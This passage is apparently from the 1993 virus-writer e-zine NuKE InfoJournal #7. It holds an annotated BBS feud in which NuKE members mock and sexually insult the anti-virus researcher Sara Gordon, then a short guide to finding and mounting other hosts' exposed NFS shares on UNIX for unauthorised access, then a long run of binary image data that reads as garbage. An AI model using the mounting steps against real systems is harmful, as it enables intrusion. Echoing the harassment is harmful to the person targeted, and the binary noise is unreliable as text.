_real_ opinions, it only expressed the opinions you wanted the public to behold), nevertheless we see the true Miss Gordon here, don't we?] if you want to talk about underlying motives of legislation, you are looking in the wrong place, john. its the virus d00dz like nowhere man, and the rest of the 'cute named guys (and gals) like 'pure energy', and that whole bunch that brought this down on us. not any anti-virus 'cartel' or that other nonsense you are talking about. [And now she insults us!] [Oh, I'm a "virus d00d" now Sara, eh?! Is Dark Avenger a "virus d00d" too? Or does that label apply only to men you don't sleep with?! Are you trying to imply at Pure Energy is a "gal?" Well, I can assure you that he's not, I've spoken with him many times, and I can assure that he is a male. Uh oh, maybe I shouldn't have said that, now she'll probably be after you P.E.! -NM] JB> send you a small collection of 43 files that originated from JB> Soloman's lab... check them out for yourself, but daggone girl, y'all JB> ask me to stop posting these little messages, how about a tiny bit of JB> help in this area... if its ok by me. c'mon john. you promised to send me you viruses a long time ago so i could use them in my evaluations project. i've been working, doing - real - work, all this time, while you have been setting up you nuke the world, nuke this and nuke that. i doubt youd want the general public to see what goes on there. im so sick of it and by it that i dont even read what those guys send me from it any more. i dont know how you can look in the mirror after some of the stunts you pull. [No, no, no Miss Gordon, _personally_ we don't know how _you_ can look in the mirror after all theses stunts _you_ pull. You only fantasize about our stunts, please let them be publicly known, as we have let your stunts be publicly known. I'm afraid you can't do it, as we don't pull "stunts." Only you Sara.] ill check out anything you send me, but i don't believe you anymore. not for a minute. if you were who you say you are, and were really concerned about the cyberspace environment, you would not say some of the things you say, creating more confusion, accusing good decent people of things that they don't do. [The only confusion here is your change of attitude, Miss Gordon.] and by the way, 'infiltrate' is not -my- word. i didn't write it and the editor has issued a -retraction- ["Infiltrate" not your style? Right, isn't that a requisite course for those associated with .mil (military)! Yes, I can see it now, this is truly a conspiracy in the making. Can't you governmental people do anything right?] ----------------------------------------------------------------------------- Rock Steady/NuKE =============================================================================== =============================================================================== NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "An E-Z Guide To Remote UNIX Disk Mounting" Nu Nu KE KE By -N -N uK uK Lvx E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 % An E-Z Guide to Remote UNIX Disk Mounting % Remote disk mounting on UNIX systems requires root access on the base system. The procedure is as follows: 1. Create a temporary directory (/tmp/lame in this example). 2. Query target with "showmount -e host.addr.addr". This will illuminate you as to which (if any) filesystems may be mounted from your machine. It will reply with: hostname:/directory/directory -options where options are the mounting options (rw, ro), who may access (host1:host2:...) and other sundry niceities. showmount -e hostname uses mountd on the remote to read the remote's /etc/exports. If your machine is listed in the access field, or if access reads "everyone," you may mount that filesystem. 3. Pick a filesystem you would like to mount. Remember that you can mount the subdierctories of the mountable directories. 4. Mount the filesystem. mount hostname:/filesystem/remote /tmp/lame 5. Do whatever you want with the filesystem. 6. Unmount the filesystem. umount /tmp/lame OR #umount hostname:/filesystem/remote REMEMBER: - You must leave the directory you are unmounting. - ALL mounts (failed or successful) are noted in /etc/rmtab on the remote system. /etc/rmtab remains until purged. - You must specify full pathnames when mounting and unmounting. MORE: - An entry of "/filesystem/directory " with no options in a host's /etc/exports will allow world-mounting of that system. - Remote mounting often uses RPC and NFS. It will work most often on Suns and workstations networked with Suns (ie: using NFS). Lvx [Note: Lvx can be contacted at The Hell Pit +1 708 459 7267 or at Nitro Burnin' Funny Cars +1 312 582 1115. -NM] =============================================================================== GIF87a@P`t  (,$0 8  ( ,$<(D   $ 0 $( $0 ,8 ,@ ,H 4L0<4D8PLt@%jȱǏ CI@FN^,ɲ˗0c̈I*'^iRϟ@ -bš>o,rӧP܉2ңDfM9&S`ÊmWeUz%XTZcʝ1Ն\WF)ݻ'8d-xQ#Z1ᾘlYp͝5> :Ҿ7V-kyl۷7͹gڱ +0Ϟ7pћ6fywuk3m-RMGN~dϷ tM>+c?<e!Vwn`J rgyƛ^Vv(^~V w`!_ jg+Hv mdʍHZh "w${?ftI9a4lW(iEyf1eO(͸dJB܄CYawVVpbU_'}aʢhd*gﱩ$J'jߙSei-~}ѝ;&F#/iF1=Td?Ve0rQMY *9=QsgpAPhTb%Iqio+) h&:4>%!exQKτOE~`2.Q @O.(tI+~ɤYV4}<<; I3;-)ڑZL,v7oJg?7jldhLVJgVi$ת4r2zOӸKf4]H% Xm3TWHZ-fVT[VrV5#\.6T \U*RsͥT:pKXZvJUTz?cV\T'3%hZmZ]kbӦ1/vE;)c.G634--!m%US" n:#X:Xҝ%cn *\ed&8RI vFՏ/aQգV~ ЊΤ f Ss^g9wkjخYWl;\ p4/p'kĶgl QrsT sMʕrn{7yk4[KDjKنEtX,FMpޡcy\13ؽ>,aCtGiE/i`sz5Vsx40[0C+o8/5 !ILp;[Ji})Uz? n~;kʅm(AW@z Q(Yfa=ݿ$|oGXۀ m³QvcSDLd9C;i&lַ9|%K*usmIZN;*E؍!L,1jnKj^ O$|C`P kBj#-UOonQϘx TRtrz8Kyb,z^BE/DqK͍aZHb32&D`$0!\j'#>{zܤ\n 66Y֤>|᳒ F3qR\|8Ǡb" R,bT06X|B@pQ|Xo^ }PfrZ5KHx^QhS'J 5G|;40|.8^lŷ#ŁFlUʦCgn}P r*^f|G[X|^cZb#gH gx<Tt2wPV\zxO6[C^gIwp 5[UB56(Z؈Z.oq -8Іnрa6!~4gftu-X%mIkwiNGGV&|Y(2MiH8xs36qf>VVWpq1:XZ}T}R$؈\>>(7:<، ȏbIhGOcUDu@_mUDd}/p~+eeJh[hP X4Pj\Xkk`ͅ`Mf䊰(bY$Ŋ)U޷u0XЕP#g f[(hc#x"ՅcӒhh8)Ah?2|pisٖJmYqM7rU6jTGqx"HJnw% ^وDžH %ɂ}dՓjX 0ْ!yd0k5:iD`&Wh]&pzxd(coJYx05(j)@؎bx#P+ȃk(>fO[]~[鶍Co\r6aRp89*ҜH^*fIE>Gt9yXxJnYqFB)4y>&m6jx(0ꕌ.و;H؆H',a9ne©+֡HڢᙈI9dfeחV !1 ˜P"9ꠟ؅ 8psz9-FX3emןy"J[mY"ěVȡhjٕ<^-h: ic kCzh(OqO7 |$M \5k`+*a+C s )[ik ]nx^XeCgz~֧Ux෭䊥Cy6(7uj)k jw ) ZtFI᪤QJP9:}ڭ*(yV  à &> + %ƈe:Ƞmʚqڢ٤F *m){sOgDaڪOP*|H]˩ 3¨gHk Ƞd &/ٳPP)ڮje|`7tG7 aFqEgPHHtʢ+ӎ')| I_ j;Yݙf)n &v롛cBC piF`j[>M;Dmȑ9e^*;\ ͍NO&O?'_+-%_3(/ ;ɜΨ_ȭ_8ԋpqw.0OB/VO6O-/ю#~` \ƨl맙l[7~ ȆgHJK~o^*,]?^2/f\?+:z^掦<ȅc. g=5b .#} O|}Ў1/|nL4 1bʼnUNХA]6互ׯazZյZ\۴YK@;3 T Ix,Y" @͔E)_tfΝ9eK.[vEmzݶWֵU km-n^)](Дɩ,z^S"Nl3vG!x=VQ½Kt}AqK0li{.R ݶ-7`! p K$nҰn(3̻ż+$cE_ M|6e+@ G $)NT9)K<,>*BS1(%=QLTSTTiEdMQʍ@2NXCK8PPq%313/lrI㐒%/I96dQC9%MQG%5EEO>OCMC}U>6t#]R嶼:|?<T[3r֧ UT%_l(#D} ÄSSmb %U?r_Of.\D7W#s"  Ee߃3G,zFaFtbW]4&1޸߀5\k^Q3)R%O4P3^"iQH,WnD?y]}翔"f,HL9b0=fvRVZ |ΊWchl]NyhE҄e2]d>HHYTsh=zoO &7_ogrrN?WG-#ZHz%#J+J0}@r>hp+~ܕ< [IDB Jɖ;?c>P U:& |~Q  f[;8ͤ&U1ސ*Wh1HeD:B]4MXؾP\Rr ##Adqo䆄;Jc12dxsECP#~Pg,M8:9^f*#Yd0)%9=2xX6KB hFh*Oy'UKI[r~ZgH7G&-iS[ĵG` (j >Buʹ5 !  ` }$bKaL+Bd3/BCF]MY(a2Fծµ<_Bȶ}W8Mpob\'a!ѥn=P)NlqE8,/ dcc!H90/ք9u[ E/&r)BoIRxޒ-E|J uF@hX.y@#E%dFC :љef򡉃1& w<ܖ][O5. TN*9C!K;"t'M|ܳnELfhj1.PJTf #v?UBѭUfxtB&nh`&Gwm_&L0`'cg3 4b)K0D$'Qna"@3fsSkc?GmkW(їH5)Y [ -mpOډŹm!eY6;uKPUa;Z\̮Ҟ'T|YaR0^ap ]qTU_4eL0@63x,/vVv3rI2 Ъ%:7xKwO} (v)ȠbC؅"exh2NbcYfuؾܾK.$_(F??}NO‹ T]4XMvw&n㱼Pqʠ)K˒]Goi3QXGX+}9p* Qٛ`[QL E+ U UY"`>MHO@s&6!!X4݃&ppir C9S kUR_"1U*+ 7y:*`S*lɺ&{ j!؅hȈb-T1sA܊;;34ʻ[>7d' `B_!k(H z ѧR {TT ddHWh|`uPЃ=S+c;A *(-g2 ~9=c]F [>]C8Aۊg6훱K4`TD4gоĐ P4E{?ʄ.A '␠pQ&1,MhP@#.2![R@3 S賻7LĹSϩŒ0[X2 >qd9vG$p7q6^3" s)1ኧ0S5<(D" , 0H4L2C; ;l KKOȞE"I|KQ;q[4I4`WڙCyH!%ẈT<(@){ K)a@%˄sВ̠hF$hsD݃2=X!.TC8srdI{IFɿ7J%I$Sv0*h9t1R.PA`hV\KeЄWkEar. 3 9 h3-0ik(A# K,MP@7qɖcDpN]B\I„G: 加g9i{0̄#S*8HЮk+GjGJG{#y%%h0E4̛ ;0x%_!؉e+E4~a'/3 Lu ^ ӁVǡ0$I2XrSIJ$DBp²+SL7i¸XAl^SAgXBMOZT`(k[!H1?44$ɚA͚mVsDL-٘DљfUqM,Lz,T N " G{"H 2SϕM ll2]V3 ä i\2laB 6|LqAoeGAq̻Jc"w`i)L`F Ƙ ҫٙziˊܫla4LE (Y!;lI? TV"0>Zj[ ?%[X2 b5M5<!%QK_A@ma/|^",_PD8;FLΒB ىn>Wc,gSq$0M)ӓD>]FS[! gEǜb e$IdYU9z{az:=64Y_7>È^:G\蛾tݿr]AK6፴V9a 'oP^t-vͭ\-C<ڣPiH)6CK>Ы h9cqw'*(0 >z:~^.~_,XДiXdKfGA8 {7^$pt1v-Hl2h #djJ*T6iɨ#Ȑ"G,i*}F 9b_\ԑK2isˍ ʓXPQ9̬RϞ*J*j+ҨtL'EIcь-]ØU5 ]2c{ֳ[F À qv |8Z47s| fdG &SuIʎxƧծ#[ͤU눭f=4bb= ^ӮX5 XVX xAbPd2ZbYsVyZGOq&PyFMBRSH44F2o(b$#27\[ν#CmTA)Mu,_u3au4Uq% yK\z# 3Z*Rw~vUMY4E.KT%x$8[jmahPN/ݔAdi &jD+Q,z4K2JO/e~27$N]{ѩR0%'F1!jq99,& R0nSVprjkCg%gr⢆ ]329‘iPE5n1* 6SmG0A6U/TK% I҆J.G'zC QF   te @ r{އ"OQcbG>:qDy(>`'#BhM;QJt$hDC<)$;XI zH.7zg EL9OЇ=0-$F`,2 Q}ALYRV 1H4@C`Q8! hP= F]= 6{a8݃p0@ D<48xF17a @pj!7u$^ى;ǰXJ$a??9ET4UV QK΀@U=85JAG7*=4Y#a)LZ' AOFAժvM}.A z>ͪN (a RAXw!IonCm<[AO7U'gg/%FP&` 4JEV(r4T 'J[:h 7h0k@}¶mqTa} \׸_MM 6Nu i\ᵐ *ɍR5bR!&C-0-eMޡ׾!'-p[š0GQY4 ;d! 1hpT;0x(5N_26 Poa:=UT nsU9xr(c,-4SCgr=ؗ!Vވn00#8l2E#1/aNn a ws€U# tna0mjAA|4_m"b[IF)}5N,x=@n0t8^p:쫏 J-d4jיc+A|-hAS,EAp%owM5^4o6 trͺ6POP"$_op*-xu_]rpr[XGiK6 QT5d!+an +7PB$:v0d&05=Ȟ+< *!"쮈,RL:\^<.?p qA hr_@ n ]pIJQ(}W r_V,̤b@p7+! v@ULMCGDO]W5|P,BչިLtd>IKY@Lܚ-tMT\q tG(Mʢx-:$,Wi@ps@ ДB&z9|YUA``mĕ 8=oNYu^et酁Fô}q]^a1TִwD]q-"v$ $Ք9KMT<@ihŔ,!L\ QpI|UTaT%5V}:B虘1]C)=GଔR#&ـ,ac4@̵fpAVj9 jAa!Dq xLL2j!F d[:#&P  ځ@LL,G÷\9Ѐ>A 8\GEYqXRk1 l ]7PDZXNTa#Y H@7@!>xYl ʦ! e^ n lXE多CR>T tEzUCR+>jA $Ҁ!WȢH 9L&CYUo%gZT@ K@ Y"61\CqY^2R&xJ,*d@iI>Јt b5=B&FzUfp=e8|!&PI7ܔ^M!@z&!'͈\ڶaYٕU-g J8 S~[s[T1ЩĀ}u9(cUTmhgԌȉN@W^Ujb7t6NhD,fWYn-Fh,DL, +KM1Xp ]i%AzcE$aW&sPܚ6N+j~z)@qX٫qEҔ0v]q(@DAD%VpkHaq߇ A7׉@9pb#҄{JO6\UnhkT=^a9UVȫX}kݪWok)˦*̢!&ӚV@qi}L(g4BZAbG=‚֚iAVhoelڔ@یML:jZpϥeέo(JK̂d~k)׮-JZ] Cb!iT筼D''Ȩ~`G ig>%=@Эާ+H,^`Ǝ*Gq o@ZL _YޔF\Ei L ,ٞ館:_|jA M,B1b )hQ>TLޯbz 't)66%֒pjMMh@+%LΠ\IԀ&]ʉ<}X6i D /И60^YႫjщM;D `S'(Aalx~0QAk)0dB8@-/1ba%kUjT+lm  {U iVkdbgzXl-=U~v-j܆6Kdq>xZ .Um2#Fvn 0'qT-T\QUr`jpyBQ2{Sj2󖽙$!zmdb(WlU ;)%ƚY(1N:OL(s'Fh gi"rsF7*۳͠m-|Nz&3I׮HqQ}&%v\\:_G'@D0%s 4rlH!DCz+"Fw:T1Ԅ1Ȕ|a34XkhP'D*.xeCu2M\jA DS ZqNo[ʩQ5~f^N[U=gI쭇`]@vVi2V$W5i&(R1]CR psrj&38Ğ.0Lb9E$D^0n4E0I lnﶁ dF"6y^*zҦh)>SGg؁&źLvTaq3h)x{v!.26DV3V6T1A)D]@@y$ςhw½1]g/H81b,ʱpz[}ib]k*Dm5:8B!ނ{kpxFQNh{^{_N + ׏uťWjku`X)&rӔ< M^xCtޝ |9HŽ |D:틫 z.H0FC(`!o4y^qCiHyHh_C=loH 49u'ٮSkb]_;n,q޸iBU5giC_s4H4!q\j)rl #;^#`qNQ3A"*TccķMڃA_ ڊ\!L3 /hʷ@ac|ԑY1VmΠM|qqz -i>O?T|R@6|DhSwxxS=@a~7bٵW`s ^Wna %/cAOI`5FVa݀;